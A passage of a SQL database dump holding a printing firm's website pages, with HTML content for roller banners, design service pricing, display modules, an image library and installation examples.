coincide with which ever unit size you already have.<br />\r\n<br />\r\n<font size=\"2\"><font color=\"#ec008c\"><strong>Width: Price: <br />\r\n <br />\r\n</strong></font><font color=\"#000000\">550 x 2000 h <strong><font color=\"#ec008c\">£ 160+vat</font></strong><br />\r\n550 x 2700 h <strong><font color=\"#ec008c\">£ 180+vat</font></strong><br />\r\n<br />\r\nAll measurements in mm..</font></font>','','','N','2010-06-08 12:07:02','2010-05-19 14:01:30',42),(43,'Layout2','7','Twist:- Possibilities','pop-up-twist-possibilities.php','Twist:- Possibilities','Twist:- Possibilities','Twist:- Possibilities','','PROD_43.jpg','','The <span class=\'pinksmalltitle\'> Twist:-Possibilities</span>','<br />\r\n<p>The Modular aspect of the twist provides a huge benefit to pick and mix between the products to create the perfect display module for your exhibition requirements. Whether your using a single Original Twist, or needing to create a large display the twist products have the facility to provide a solution. The modular nature of the twist means that there is an unprecedented amount of options available.</p>','','','','','N','2010-05-19 15:02:58','2010-05-19 14:02:58',43),(44,'Layout2','7','Design Option A','pop-up-design-a.php','Design Option A','Design Option A','Design Option A','','PROD_44.jpg','','<span class=\'pinksmalltitle\'> Design Option A</span>','<br />\r\n<p>Black, White, Solid Colour or Colour Gradient background. Name, Address etc. at the top in a fixed position. Images placed in pre-designed positions with or without surrounding Pinline.<br />\r\n<br />\r\nAll images to be supplied for design must be saved as a JPG at the best posssible quality (preferably 150-300dpi). Any images deemed to be of poor quality will be queried before any work is undertaken. Any further work which falls outside of the framework of the initial design fee will then be quoted for, on request.</p>','<span class=\'pinksmalltitle\'> Price</span>','<br />\r\n<p><font color=\"#000000\">Price for design work.</font></p>\r\n<p><strong><font color=\"#ec008c\">£50+vat</font></strong></p>','','','Y','2010-06-10 09:49:36','2010-05-19 14:08:14',44),(45,'Layout2','7','Design Option B','pop-up-design-b.php','Design Option B','Design Option B','Design Option B','','PROD_45.jpg','','<span class=\\\'pinksmalltitle\\\'> Design Option B</span>','<br />\r\nMore design aesthetics are taken into consideration with Option B with ghosted imagery used in the background adding depth. Also with Option B, typographic style, placement and image composition are balanced giving the final product a more individual feel.<br />\r\n<br />\r\nAll images to be supplied for design must be saved as a JPG at the best posssible quality (preferably 150-300dpi). Any images deemed to be of poor quality will be queried before any work is undertaken. Any further work which falls outside of the framework of the initial design fee will then be quoted, on request.','<span class=\\\'pinksmalltitle\\\'> Price</span>','<br />\r\n<p><font color=\"#000000\">Price for design work.<br />\r\n</font><strong><font color=\"#ec008c\">£70+vat</font></strong></p>','','','Y','2010-06-10 09:49:46','2010-05-19 14:10:24',45),(46,'Layout2','7','Design Option C','pop-up-design-c.php','Design Option C','Design Option C','Design Option C','','PROD_46.jpg','','<span class=\'pinksmalltitle\'> Design Option C</span>','<br />\r\nA totally Bespoke Option allowing the design to be totally brief generated. Each individual design will be unique as the design will be produced entirely from design brief specification, utilising more complex design elements such as intricate image cut-outs and purpose designed backgrounds.<br />\r\n<br />\r\nAll images to be supplied for design must be saved as a JPG at the best posssible quality (preferably 150-300dpi). Any images deemed to be of poor quality will be queried before any work is undertaken. Any further work which falls outside of the framework of the initial design fee will then be quoted for, on request.','<span class=\'pinksmalltitle\'> Price</span>','<p><font color=\"#000000\"><br />\r\nPrice for design work.</font></p>\r\n<p><font color=\"#ec008c\"><strong>£100+vat</strong> </font><font color=\"#000000\" size=\"1\">(Starting Price)</font></p>','','','Y','2010-06-10 09:49:56','2010-05-19 14:17:16',46),(47,'Layout1','7','Design Disclaimer','design-disclaimer.php','Design Disclaimer','Design Disclaimer','Design Disclaimer','<p align=\"left\"> </p>\r\n<font size=\"2\">\r\n<p>In each instance of any design work to be undertaken by Paul Graham Ltd Pop-Up <br />\r\nRoller Banner System, the charge of the design work must be paid for in full before any work <br />\r\nis started.<br />\r\n<br />\r\nWe have categorised these designs to best suit a varying range of customer needs. In any <br />\r\ninstance where work has to go beyond the specifications of each design band, said work will <br />\r\nbe charged on a quotation basis. <font size=\"1\">(This will be confirmed and a price will be supplied before any further <br />\r\nwork is undertaken).<br />\r\n<br />\r\n</font>After the initial design has been completed we will, as a good will gesture, offer one small <br />\r\namendment free of charge. Any further design alterations will be charged for depending on the <br />\r\nlevel of work required.<br />\r\n<br />\r\nAny images supplied as negatives or hand rendered media such as paintings, illustrations or <br />\r\nactual photographic prints will incur a scanning fee which will, in every case, be agreed upon <br />\r\nbefore any works are undertaken.<br />\r\n<br />\r\nPlease do bear in mind that we at Paul Graham Ltd adhere to the strictest of copyright law and <br />\r\nwill not, under any circumstances, reproduce or manufacture an item which would infringe any <br />\r\npart of said law.<br />\r\n<br />\r\nAll artwork and design remain the property of Paul Graham Ltd; however, it can be purchased <br />\r\nfor a small fee should it be required to be used in any further publications or advertising. <br />\r\n<font size=\"1\">(If the artwork being supplied requires any size alterations this will also carry a charge which will be quoted on request).</font> <br />\r\nThe design can be either emailed or written to cd and will be charged at £30 + vat for each copy.<br />\r\n<br />\r\nFor any further information regarding design or design charges please do not hesitate to contact us on: <br />\r\nt: (01254) 200330 or e:mail@paulgrahamltd.com</p>\r\n</font>','','','','','','','','','Y','2010-06-03 16:32:02','2010-05-19 14:21:06',47),(48,'Layout2','8','The Showcase 3x3 Module','disp-sys-showcase-3x3.php','The Showcase 3x3 Module','The Showcase 3x3 Module','The Showcase 3x3 Module','','PROD_48.jpg','','The <span class=\'pinksmalltitle\'> Showcase 3x3 Module</span>','<br />\r\nThe Showcase Package is a fantastic visual display product which includes everything needed - all that is required is to add the graphics.<br />\r\n<br />\r\nA highly professional, sleek, stylish and simply effective unit to display your graphics in any surrounding. The unit comes complete with case to lecturn conversion kit, extendable frame, magnetic bars, two halogen lamps and carry case. Each graphic panel is also laminated for added graphic durability.','Graphic Size & <span class=\'pinksmalltitle\'> Price</span>','<p><br />\r\nThe height of the graphic panels for each module is 2130mm H x 653mm W. Assembled dimensions: <br />\r\n2140 h - 2492 w - 596 d <br />\r\n-All measurements in mm\'s<br />\r\n<br />\r\nWhen supplying artwork it must be sent in as one complete graphic sized at 3918mm w x 2130mm h<br />\r\n<br />\r\nThe module completed consists of 5 graphic panels 3 main (within the curve) and two end curve side panels, so do bear this in mind. We do offer an in-house design service which for this product is quoted on request please contact us on (01254) 681001 for design breakdowns and costs.<br />\r\n<br />\r\n<strong><font color=\"#ec008c\" size=\"2\">3x3 Module<br />\r\n<br />\r\n£ 799+vat</font></strong></p>','','','Y','2011-11-05 16:24:39','2010-05-19 15:00:20',50),(49,'Layout2','8','The Showcase 3x4 Module','disp-sys-showcase-3x4.php','The Showcase 3x4 Module','The Showcase 3x4 Module','The Showcase 3x4 Module','','PROD_49.jpg','','The <span class=\'pinksmalltitle\'> Showcase 3x4 Module</span>','<br />\r\nThe Showcase Package is a fantastic visual display product which includes everything you need in the package - all you have to do is add the graphics.<br />\r\n<br />\r\nA highly professional, sleek, stylish and simple but effective unit to display your graphics in any surrounding. The unit comes complete with case to lecturn conversion kit, extendable frame, magnetic bars, two halogen lamps and carry case. Each graphic panel is also laminated for added graphic durability.','Graphic Size & <span class=\'pinksmalltitle\'> Price</span>','<br />\r\n<p>The height of the graphic panels for each module is 2130mm H x 653mm W. Assembled dimensions: <br />\r\n2140 h - 3073 w - 796 d <br />\r\n-All measurements in mm\'s <br />\r\n<br />\r\nWhen supplying artwork it must be sent in as one complete graphic sized at 3918mm w x 2130mm h<br />\r\n<br />\r\nThe module completed consist\'s of 6 graphic panels 4 main (within the curve) and two end curve side panels, so do bear this in mind. We do offer an in-house design service which for this product is quoted on request please contact us on (01254) 200330 for design breakdowns and costs.<br />\r\n<br />\r\n<strong><font color=\"#ec008c\" size=\"2\">3x4 Module<br />\r\n<br />\r\n£ 899+vat</font></strong></p>','','','Y','2010-06-10 09:53:52','2010-05-19 15:08:17',51),(50,'Layout2','8','Twist Possibilities','disp-sys-twist-pos.php','Twist Possibilities','Twist Possibilities','Twist Possibilities','','PROD_50.jpg','','The <span class=\'pinksmalltitle\'> Twist:-Possibilities</span>','<br />\r\n<p>The Modular aspect of the twist provides a huge benefit to pick and mix between the products to create the perfect display module for your exhibition requirements. Whether your using a single Original Twist, or needing to create a large display the twist products have the facility to provide a solution. The modular nature of the twist means that there is an unprecedented amount of options available.<br />\r\n<br />\r\nFor more in-depth information regarding the twist modular systems please go to our pop-up roller banner section in our products and services area.</p>','','','','','Y','2010-05-19 16:12:54','2010-05-19 15:12:54',49),(51,'Layout2','8','The H2o Swingmaster','disp-sys-The-H2o-Swingmaster.php','The H2o Swingmaster','The H2o Swingmaster','The H2o Swingmaster','','PROD_51.jpg','','The <span class=\\\'pinksmalltitle\\\'> The H2o Swingmaster</span>','<br />\r\n<p>The H2o Swingmaster is a perfect solution for indoor and outdoor visual advertising. A unit comprising of two laminated A1 prints which are securely clipped in to the two faces of the unit.<br />\r\n<br />\r\nThe unit itself is very easily constructed, is highly durable and purpose built.. The base of the unit has a hollow base allowing you to fill the unit with water to keep the unit fixed and secure in its desired placement.<br />\r\n<br />\r\nThe price of the unit includes the two A1 laminated prints.</p>','Graphic Size & <span class=\\\'pinksmalltitle\\\'> Price</span>','<p><br />\r\nThe Size of each graphic panel is A1.<br />\r\n<br />\r\n<strong><font color=\"#ec008c\">£ 199+vat</font></strong></p>','','','Y','2010-06-01 10:27:10','2010-05-19 15:16:27',98),(52,'Layout1','4','What the Image Library is','image-library-what-is.php','What the Image Library is','What the Image Library is','What the Image Library is','<br />\r\nOur image library is a concise catalogue consisting of varying examples <br />\r\nof artistic imagery and styles.<br />\r\n<br />\r\nCreated in-house, each image has the facility to be proportionately adjusted <br />\r\nand also colour matched to suit it\'s desired surroundings.<br />\r\n<br />\r\nWe have arranged our imagery into 3 separate, sections allowing you to <br />\r\nsearch specifically through the section of your choosing.<br />\r\n<br />\r\nEach image has been created to suit any purpose or surroundings and to be <br />\r\nused in either the home or office environment. For further information regarding the imagery <br />\r\nor the service please do not hesitate to contact the studio <br />\r\non (01254) 200330.','','','','','','','','','N','2010-05-31 11:09:39','2010-05-19 15:18:38',52),(53,'Layout1','4','Abstract','image-library-abstract.php','Abstract','Abstract','Abstract','<p align=\"left\"><strong><font color=\"#ec008c\">In this row:-</font></strong> Red Rush 1, Red Rush 2 , Red Rush 3<br />\r\n<img alt=\"\" width=\"200\" height=\"200\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/red rush 01 left.jpg\" /> <img alt=\"\" width=\"200\" height=\"199\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/red rush 02 centre.jpg\" /> <img style=\"width: 200px; height: 200px\" alt=\"\" width=\"200\" height=\"202\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/red rush 03 right.jpg\" /><br />\r\n<br />\r\n<font color=\"#ec008c\"><strong>In this row:-</strong></font> Big Red Multi, Circles, Lines<br />\r\n<img alt=\"\" width=\"200\" height=\"200\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Big Multi red in allah folder.jpg\" /> <img style=\"width: 200px; height: 200px\" alt=\"\" width=\"200\" height=\"199\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/circle d.jpg\" /> <img alt=\"\" width=\"200\" height=\"201\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/lines bottom left.jpg\" /><br />\r\n<br />\r\n<font color=\"#ec008c\"><strong>In this row:-</strong></font> Clouds, Quercus Quadra 1, Quercus Quadra 2<br />\r\n<img alt=\"\" width=\"200\" height=\"198\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/mapping clouds full frame.jpg\" /> <img style=\"width: 200px; height: 198px\" alt=\"\" width=\"200\" height=\"202\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/quercus quadra 01.jpg\" /> <img style=\"width: 200px; height: 198px\" alt=\"\" width=\"200\" height=\"199\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/quercus quadra 02.jpg\" /><br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:-</font></strong> Rough Brown, Red Score, Tall Trees<br />\r\n<img alt=\"\" width=\"200\" height=\"198\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/rough square inverted.jpg\" /> <img style=\"width: 200px; height: 198px\" alt=\"\" width=\"200\" height=\"197\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/red score .jpg\" /> <img style=\"width: 200px; height: 198px\" alt=\"\" width=\"200\" height=\"202\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/tall trees original.jpg\" /><br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:-</font></strong> Underground, Wood Knot White, Wood Knot<br />\r\n<img alt=\"\" width=\"200\" height=\"195\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/underground bw.jpg\" /> <img style=\"width: 200px; height: 194px\" alt=\"\" width=\"200\" height=\"204\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/wood knot original.jpg\" /> <img style=\"width: 200px; height: 194px\" alt=\"\" width=\"200\" height=\"198\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/wood knot.jpg\" /><br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:-</font></strong> Arcs, Leaf Light<br />\r\n<img alt=\"\" width=\"300\" height=\"149\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/arcs brown burgundy.jpg\" /> <img style=\"width: 300px; height: 150px\" alt=\"\" width=\"300\" height=\"143\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/leaf light as double.jpg\" /> <br />\r\n<strong><font color=\"#ec008c\"><br />\r\nIn this row:-</font></strong> Bronze Landscape, Orange & Brown Multi<br />\r\n<img alt=\"\" width=\"300\" height=\"131\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/bronze landscape 01.jpg\" /> <img alt=\"\" width=\"300\" height=\"135\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/the big multi coffe and orange.jpg\" /> <br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:-</font></strong> Dusk, Coffee Seas/Turquoise<br />\r\n<img alt=\"\" width=\"300\" height=\"173\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/dusk 3 on tile.jpg\" /> <img alt=\"\" width=\"300\" height=\"156\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/seas coffee new tourquise.jpg\" /><br />\r\n<strong><font color=\"#ec008c\"><br />\r\nIn this row:-</font></strong> Black & White Patch<br />\r\n<img alt=\"\" width=\"300\" height=\"115\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/patch panels bw.jpg\" /><br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:-</font></strong> Cool Sun Sage<br />\r\n<img alt=\"\" width=\"600\" height=\"213\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/New_Sage.jpg\" /><br />\r\n<strong><font color=\"#ec008c\"><br />\r\nIn this row:-</font></strong> Something Mediteranean<br />\r\n<img alt=\"\" width=\"600\" height=\"197\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Med_Red.jpg\" /><br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:-</font></strong> Blue Swirl<br />\r\n<img alt=\"\" width=\"600\" height=\"165\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Blue_Swirl.jpg\" /><br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:-</font></strong> Phormium 1 & 2 , Colour Wash<br />\r\n<img alt=\"\" width=\"196\" height=\"344\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/phormium green 01.jpg\" /> <img style=\"width: 196px; height: 344px\" alt=\"\" width=\"196\" height=\"347\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/phormium green 02.jpg\" /> <img style=\"width: 196px; height: 343px\" alt=\"\" width=\"196\" height=\"425\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/colour wash warm.jpg\" /><br />\r\n<strong><font color=\"#ec008c\"><br />\r\nIn this row:-</font></strong> Retro, True Blue, Aubergine Sea<br />\r\n<img alt=\"\" width=\"196\" height=\"410\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/maki wobble warm browns.jpg\" /> <img style=\"width: 196px; height: 410px\" alt=\"\" width=\"196\" height=\"402\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/maki wobble 2 true blue.jpg\" /> <img style=\"width: 196px; height: 410px\" alt=\"\" width=\"196\" height=\"281\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/aubergine sea pink.jpg\" /><br />\r\n<br />\r\n <strong><font color=\"#ec008c\">In this row:-</font></strong> Loops, Curly Tree, Red Statement<br />\r\n<img alt=\"\" width=\"196\" height=\"244\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/loops original.jpg\" /> <img style=\"width: 196px; height: 255px\" alt=\"\" width=\"196\" height=\"246\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Curly Tree .jpg\" /> <img alt=\"\" width=\"196\" height=\"237\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/statement red.jpg\" /><br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:-</font></strong> Orange Peel<br />\r\n<img style=\"width: 202px; height: 297px\" alt=\"\" width=\"196\" height=\"297\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Orange Peel .jpg\" /> </p>','','','','','','','','','N','2010-05-31 11:09:56','2010-05-19 15:19:28',53),(54,'Layout1','4','Floral','image-library-floral.php','Floral','Floral','Floral','<p><strong><font color=\"#ec008c\">In this row:-</font></strong> Four Grasses, Tulips<br />\r\n<img height=\"137\" width=\"298\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/four grasses as four.jpg\" alt=\"\" /> <img height=\"131\" width=\"300\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/tulips 1.jpg\" alt=\"\" style=\"width: 300px; height: 138px;\" /> <br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:-</font></strong> Meadows<br />\r\n<img height=\"120\" width=\"300\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/monk meadows.jpg\" alt=\"\" /><br />\r\n<strong><font color=\"#ec008c\"><br />\r\nIn this row:-</font></strong> Rose Barlow 1, 2 & 3<br />\r\n<img height=\"198\" width=\"200\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/rose barlow aquilegia 01.jpg\" alt=\"\" /> <img height=\"199\" width=\"200\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/rose barlow aquilegia 02.jpg\" alt=\"\" /> <img height=\"195\" width=\"200\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/rose barlow aquilegia 03.jpg\" alt=\"\" style=\"width: 200px; height: 200px;\" /><br />\r\n<strong><font color=\"#ec008c\"><br />\r\nIn this row:-</font></strong> Clematis, Gladiola, Poppies<br />\r\n<img height=\"200\" width=\"200\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/clematis 01 white.jpg\" alt=\"\" /> <img height=\"199\" width=\"200\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/gladiola red .jpg\" alt=\"\" /> <img height=\"173\" width=\"200\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Poppies .jpg\" alt=\"\" style=\"width: 200px; height: 199px;\" /><br />\r\n<strong><font color=\"#ec008c\"><br />\r\nIn this row:-</font></strong> High Reds, Pink Grasses<br />\r\n<img height=\"298\" width=\"196\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/high reds 02.jpg\" alt=\"\" style=\"width: 196px; height: 328px;\" /> <img height=\"329\" width=\"196\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/four grasses bukhara red.jpg\" alt=\"\" /></p>','','','','','','','','','N','2010-06-04 14:10:17','2010-05-19 15:20:26',54),(55,'Layout1','4','Scenic','image-library-scenic.php','Scenic','Scenic','Scenic','<p><strong><font color=\"#ec008c\">In this row:-</font></strong> Arizole, Wetlands<br />\r\n<img style=\"width: 300px; height: 213px\" alt=\"\" width=\"300\" height=\"198\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Arizole.jpg\" /> <img alt=\"\" width=\"300\" height=\"213\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/wetlads.jpg\" /> <br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:-</font></strong> Warton Sands<br />\r\n<img alt=\"\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/WARTON.jpg\" /><br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:-</font></strong> Ghost Tree, Morning Light 2 Colour, Moring Light 2 Sepia,<br />\r\n<img alt=\"\" width=\"200\" height=\"200\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Ghost Trees .jpg\" /> <img alt=\"\" width=\"200\" height=\"200\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/morning light 03.jpg\" /> <img alt=\"\" width=\"200\" height=\"201\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/morninglight1_d.jpg\" /><br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:-</font></strong> Morning Light 1 Colour & Sepia<br />\r\n<img alt=\"\" width=\"300\" height=\"159\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Morning_Light_1_Col.jpg\" /> <img alt=\"\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Morning_Light_1_Sep.jpg\" /> <br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:- </font></strong>Morning Light Sepia & Colour<br />\r\n<img alt=\"\" width=\"300\" height=\"158\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Morning_Light_Sep.jpg\" /> <img alt=\"\" width=\"300\" height=\"158\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Morning_Light_Col.jpg\" /><br />\r\n<strong><font color=\"#ec008c\">In this row:-</font></strong> Maldives Sunset 5, Maldives Sunset 4<br />\r\n<img alt=\"\" width=\"300\" height=\"200\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Mald_2.jpg\" /> <img alt=\"\" width=\"300\" height=\"199\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Maldeives_1.jpg\" /><br />\r\n<strong><font color=\"#ec008c\"><br />\r\nIn this row:-</font></strong> Cumbrian Hills, Hay Bales<br />\r\n<img alt=\"\" width=\"300\" height=\"160\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Green_Hills.jpg\" /> <img alt=\"\" width=\"300\" height=\"111\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Hay.jpg\" /><br />\r\n <br />\r\n<br />\r\n<strong><font color=\"#ec008c\">In this row:- </font></strong>Sunset, Misty Morning<br />\r\n<img alt=\"\" width=\"300\" height=\"449\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Sunset_lake.jpg\" /> <img style=\"width: 300px; height: 450px\" alt=\"\" width=\"300\" height=\"433\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Misty.jpg\" /><br />\r\n<br />\r\n<br />\r\n </p>','','','','','','','','','N','2010-05-19 16:21:11','2010-05-19 15:21:11',55),(56,'Layout1','4','Colour Disclaimer','image-library-disclaimer.php','Colour Disclaimer','Colour Disclaimer','Colour Disclaimer','<p><br />\r\nAt pg imaging we strive for perfection in every instance of production. <br />\r\nWe have invested time and effort in to creating the artistic images displayed <br />\r\nwithin this gallery to best suit your needs. <br />\r\n<br />\r\nDue to continual progression in the production and manufacture of computer <br />\r\nand personal monitors and screens, we have shown the images online which <br />\r\nrepresent true colour on our calibrated studio monitors. <br />\r\n<br />\r\nAs differing manufacturers use numerous technologies and software to create <br />\r\ncolour output, we urge you to take into consideration that the images within our <br />\r\nlibrary will look different on different monitors depending on their individual <br />\r\nattributes.</p>\r\n<p>We have shown these images as a representation and will strive to output <br />\r\neach image to exactly the (industry standard) calibration used within our studio. <br />\r\nFor more information regarding this please have no hesitation in contacting <br />\r\nus on (01254) 200330.</p>','','','','','','','','','N','2010-05-31 11:14:49','2010-05-19 15:22:23',57),(57,'Layout1','4','How the Library Works','image-library-works.php','How the Library Works','How the Library Works','How the Library Works','<br />\r\n<br />\r\n<img alt=\"\" src=\"http://www.theimaginghouse.co.uk/EditorImages/image/How_The_Library_Works-PG(1).jpg\" />','','','','','','','','','N','2010-06-04 14:09:03','2010-05-19 15:35:04',56),(58,'Layout1','9','Full of \'Bright\' Ideas','bright-ideas.php','Full of \'Bright\' Ideas','Full of \'Bright\' Ideas','Full of \'Bright\' Ideas','<br />\r\n<p align=\"left\"><img height=\"1218\" width=\"750\" align=\"left\" src=\"http://www.paulgrahamltd.com/EditorImages/image/Bright_Ideas-NEW-PG.jpg\" alt=\"\" /></p>','','','','','','','','','Y','2010-06-09 11:26:48','2010-05-19 15:43:21',58),(59,'Layout1','9','Installation 1','com-sol-inst-1.php','Installation 1','Installation 1','Installation 1','<p><img alt=\"\" align=\"left\" width=\"747\" height=\"602\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/com_1.jpg\" /><br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<font color=\"#ec008c\"><strong>Featured Product:<br />\r\n</strong><font color=\"#000000\">Product featured is a bespoke 3 dimensional take on our </font><font color=\"#ec008c\"><strong>\'sleek\'</strong> </font><font color=\"#000000\">cutting edge acrylic and <br />\r\nfinished with a mirror backed cutout acrylic panel.<br />\r\n<br />\r\n</font><strong><font color=\"#ec008c\">Colour Used:</font><br />\r\n</strong><font color=\"#000000\">Due to its design, this product can be created with any 2 colours from our extensive colour <br />\r\n</font></font><font color=\"#ec008c\"><font color=\"#000000\">selection. Featured product shown in electric blue and kiwi green.<br />\r\n<br />\r\n</font><strong><font color=\"#ec008c\">Approx Size:</font><br />\r\n</strong></font><font color=\"#000000\">12\' w x 8\' h. As all aspects of our products are made in-house, we have the facilty to<br />\r\nalter sizes and dimensions to create a \' space utilising\' design that best suits your <br />\r\nworkplace or branding criteria.</font></p>','','','','','','','','','N','2010-06-03 16:27:32','2010-05-20 07:48:24',59),(60,'Layout1','9','Installation 2','com-sol-inst-2.php','Installation 2','Installation 2','Installation 2','<br />\r\n<p><img alt=\"\" align=\"left\" width=\"747\" height=\"627\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Com_2(1).jpg\" /><br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<strong><font color=\"#ec008c\">Featured Product:<br />\r\n</font></strong><strong><font color=\"#ec008c\">Featured Product:<br />\r\n</font></strong>Product featured is a bespoke take on our <font color=\"#ec008c\"><strong>\'sleek\'</strong> </font>cutting edge acrylic, <br />\r\nthis time using a clustered composition offsetting each image at <br />\r\nvarying heights.<br />\r\n<strong><font color=\"#ec008c\"><br />\r\nColour Used:</font></strong><br />\r\nAs the product is based on our <font color=\"#ec008c\"><strong>\'sleek\' </strong></font><font color=\"#000000\">product only the colour of the <br />\r\nimage panels will be visible but these can be in any colour of <br />\r\nyour choosing.</font> <br />\r\n<br />\r\n<strong><font color=\"#ec008c\">Approx Size:</font></strong><br />\r\n9\' w x 7.5\' h. As all aspects of our products are made in-house, we have the <br />\r\nfacility to alter sizes and dimensions to create a \' space utilising\' design that <br />\r\nbest suits your workplace or branding criteria.</p>','','','','','','','','','N','2010-06-01 10:29:58','2010-05-20 07:53:23',60),(61,'Layout1','9','Installation 3','com-sol-inst-3.php','Installation 3','Installation 3','Installation 3','<br />\r\n<img alt=\"\" align=\"left\" width=\"747\" height=\"471\" src=\"http://www.theimaginghouse.co.uk//EditorImages/image/Com_3(2).jpg\" /><br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<font color=\"#ec008c\"><br />\r\n<br />\r\n<strong>Featured Product:<br />\r\n</strong><font color=\"#000000\">Product featured is a bespoke take on our </font><font color=\"#ec008c\"><strong>\'verge\'</strong> </font><font color=\"#000000\">cutting edge acrylic. <br />\r\nAs you can see, we have used colour co-ordinated acrylic panels and offset <br />\r\nthe imagery at overlaid heights to bring the surrounding environment to life.<br />\r\n<br />\r\n</font><strong><font color=\"#ec008c\">Colour Used:</font><br />\r\n</strong><font color=\"#000000\">Matching the acrylic panels to the surroundings we have used kiwi green.<br />\r\nThe imagery used within the presentation can also be found in our online <br />\r\nimage library.<br />\r\n<br />\r\n</font><strong><font color=\"#ec008c\">Approx Size:</font><br />\r\n</strong></font><font color=\"#000000\">6\' w x 5\' h. As all aspects of our products are made in-house we have the facility to<br />\r\nalter sizes and dimensions to create a \'space utilising\' design that best suits your <br />\r\nworkplace or branding 